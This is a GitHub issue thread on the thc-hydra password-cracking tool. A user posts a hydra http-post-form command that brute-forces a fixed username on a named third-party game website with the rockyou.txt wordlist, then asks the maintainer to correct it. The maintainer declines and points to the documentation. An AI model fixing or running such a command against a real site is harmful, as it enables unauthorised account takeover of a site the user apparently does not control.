### ISSUE TITLE
http-post-form stopping wrong results 

### ISSUE THREAD

**Issue by LOOLOOOL** [vanhauser-thc/thc-hydra#48]
hydra -l abcdefzz  -P rockyou.txt  1.gangsterparadise.co.uk http-form-post /"index2.php:Username=^USER^&Password=^PASS^:The username you entered was found, but the password was incorrect!" -vV

1.gangsterparadise.co.uk

it stops after 16 tries and it says all 16 tries were successful when they were all wrong 

take a look at the website correct my code before you delete this post please i will donate to your project

**Comment by vanhauser-thc** [comment]
we dont accept donations, sorry.
read the documenation, there is a lot out there on how to do that
